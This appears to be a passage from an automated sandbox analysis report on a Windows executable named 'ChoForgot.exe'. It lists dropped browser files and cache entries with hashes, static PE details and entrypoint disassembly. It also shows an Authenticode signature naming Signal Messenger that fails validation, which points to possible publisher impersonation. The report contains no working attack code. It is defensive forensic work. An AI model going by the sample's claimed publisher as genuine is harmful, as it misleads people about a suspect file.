                                                                                                                                                                                                                                                                                                      SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                      MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                      SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                      SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                      SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):291
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                      MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                      SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                      SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                      SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):130866
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                      MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                      SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                      SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                      SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\e69e760c-2df5-4b0e-b362-34217efbffcc.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):154477
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                      MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                      SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                      SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                      SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                                      Chrome Cache Entry: 460

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (7850)
                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                      Size (bytes):7856
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.789955495614175
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:qPaH6666sOE93rm+JwwFd66666f/ckmNKfwIlvGKkglLcejpWjo:qCH66661EJx66666HXBkqoe1Wjo
                                                                                                                                                                                                                                                                                                      MD5:C02718F5C43496A84911527142FC158C
                                                                                                                                                                                                                                                                                                      SHA1:F9DD6EA6F80F703F76768C032A25513C79FA9EAC
                                                                                                                                                                                                                                                                                                      SHA-256:7C35BF89981696F63FB110BACB61785B99B8587343BF26D971130407C64E07EB
                                                                                                                                                                                                                                                                                                      SHA-512:23F43234755795D473108A4C2674610C0A405EE1CD96C5EBA9371BF9FE62FAB516D9D540CD2BED70680181D6BA965973CCA7A16C10ABD8AA71B4B5B3768B681E
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                      Preview:)]}'.["",["pok.mon go holiday part 2","michael penix jr falcons highlights","tesco aldi morrisons product recalls","quordle hints december 23","michigan winter weather advisory","monday night football","logan airport holiday travel delays","aew dynamite"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CgkvbS8wMWJxNTASEVRlbGV2aXNpb24gc2VyaWVzMt8OZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFRQU1CSWdBQ0VRRURFUUgveEFBYUFBQUNBd0VCQUFBQUFBQUFBQUFBQUFBQUJRUUdCd01DLzhRQU1CQUFBZ0lCQXdJRkF3SUdBd0FBQUFBQUFRSURCQkVBQlJJVElRWWlN

                                                                                                                                                                                                                                                                                                      Chrome Cache Entry: 461

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                      MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                      SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                      SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                      SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                      Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                                                      Chrome Cache Entry: 462

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                      Size (bytes):132739
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.436984377819433
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:fjkJQ7O4N5dTm+syHEt4W3XdQ4Q6quSr/nUW2i6o:fWQ7HTt/sHdQ4Q6qDfUW8o
                                                                                                                                                                                                                                                                                                      MD5:6EDCEF36C27BD2E50538AB6DC8790877
                                                                                                                                                                                                                                                                                                      SHA1:03F00F55185C5E8C1F911EB1C37AD64C6A4418C4
                                                                                                                                                                                                                                                                                                      SHA-256:5C37D965C76078A626B79FDCA9386A5E229E2FA58C5AD5CD9E02C30DA159E07A
                                                                                                                                                                                                                                                                                                      SHA-512:4FAF6E36F23947F3974B53BE6B1AE1C9D1618ED75B6D7D1182818B3514401E5229FC34584007BAFA203CD40A89025282894A034025FA945AEABB3E9398CAF338
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                      Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                                                      Chrome Cache Entry: 463

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                      Size (bytes):5162
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                                      MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                                      SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                                      SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                                                      SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                                                      Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                                                                                      Chrome Cache Entry: 464

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                      Size (bytes):1660
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                                      MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                                      SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                                                      SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                                      SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.961737911202392
                                                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                      File name:ChoForgot.exe
                                                                                                                                                                                                                                                                                                      File size:1'111'393 bytes
                                                                                                                                                                                                                                                                                                      MD5:06342512b7bcdfdda8d6ea8e2d5a24e4
                                                                                                                                                                                                                                                                                                      SHA1:5a656ac27d5a03ee63f08dd499bacd01e0a12c3f
                                                                                                                                                                                                                                                                                                      SHA256:89b55665c76315777e1f2a9a5be784fd2590b917388f657c6f5c2caa055e87c2
                                                                                                                                                                                                                                                                                                      SHA512:5824c39a30b7acacd949812bafcf99afcdc95361b2196567aae4e1f2445803c37971a572537c132a01b930e204745ccf7f082386147ea3b611c745eef2ea3eb4
                                                                                                                                                                                                                                                                                                      SSDEEP:24576:StmrKn0UVWKbcO1wZ8Baw0QD4Iv2kSen/rhSjJVC6h2Lg2np2uGVemv+Gl9o:8O6rIO1k8L0QcIv7nThSjeuKzDAemu
                                                                                                                                                                                                                                                                                                      TLSH:C735239AAB7118FEFFE20EB16136C50609BAF2554B38D66FB311884E7419B417A0C737
                                                                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                                                                                      Icon Hash:6066ced2d0c4fc0c

                                                                                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                      Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                      Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                                                                                                                                                                      Authenticode Signature

                                                                                                                                                                                                                                                                                                      Signature Valid:false
                                                                                                                                                                                                                                                                                                      Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                                                                                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                                      Error Number:-2146869232
                                                                                                                                                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                                                                                                                                                      • 11/09/2024 15:33:41 12/09/2027 15:33:41
                                                                                                                                                                                                                                                                                                      Subject Chain
                                                                                                                                                                                                                                                                                                      • CN="Signal Messenger, LLC", O="Signal Messenger, LLC", L=Mountain View, S=California, C=US, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, SERIALNUMBER=6703101, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                                                                                                                      Version:3
                                                                                                                                                                                                                                                                                                      Thumbprint MD5:D4E75D16F15BD3BC32ACDF4EAF83A59A
                                                                                                                                                                                                                                                                                                      Thumbprint SHA-1:8A5A56EFFDC462AE8A6CF732BB21E2541995BF36
                                                                                                                                                                                                                                                                                                      Thumbprint SHA-256:44DBAC9846A7E8F8EAE8BF0F9518B44FB86C257DD797742B767AF6ED1995AAF4
                                                                                                                                                                                                                                                                                                      Serial:4EF1C2D67B37517957F42E8D

                                                                                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                                                                      sub esp, 000002D4h
                                                                                                                                                                                                                                                                                                      push ebx
                                                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                                                      push esi
                                                                                                                                                                                                                                                                                                      push edi
                                                                                                                                                                                                                                                                                                      push 00000020h
                                                                                                                                                                                                                                                                                                      xor ebp, ebp
                                                                                                                                                                                                                                                                                                      pop esi
                                                                                                                                                                                                                                                                                                      mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                                      mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                                      mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                                      call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                                      push 00008001h
                                                                                                                                                                                                                                                                                                      call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                                                      call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                                      push 00000008h
                                                                                                                                                                                                                                                                                                      mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                                      call 00007FEDFCC4B47Bh
                                                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                                                      push 000002B4h
                                                                                                                                                                                                                                                                                                      mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                                      lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                                                      push 0040A264h
                                                                                                                                                                                                                                                                                                      call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                                      push 0040A24Ch
                                                                                                                                                                                                                                                                                                      push 00476AA0h
                                                                                                                                                                                                                                                                                                      call 00007FEDFCC4B15Dh
                                                                                                                                                                                                                                                                                                      call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                                                                      mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                                      push edi
                                                                                                                                                                                                                                                                                                      call 00007FEDFCC4B14Bh
                                                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                                                      call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                                      cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                                      mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                                      mov eax, edi
                                                                                                                                                                                                                                                                                                      jne 00007FEDFCC48A4Ah
                                                                                                                                                                                                                                                                                                      push 00000022h
                                                                                                                                                                                                                                                                                                      pop esi
                                                                                                                                                                                                                                                                                                      mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                                      push esi
                                                                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                                                                      call 00007FEDFCC4AE21h
                                                                                                                                                                                                                                                                                                      push eax
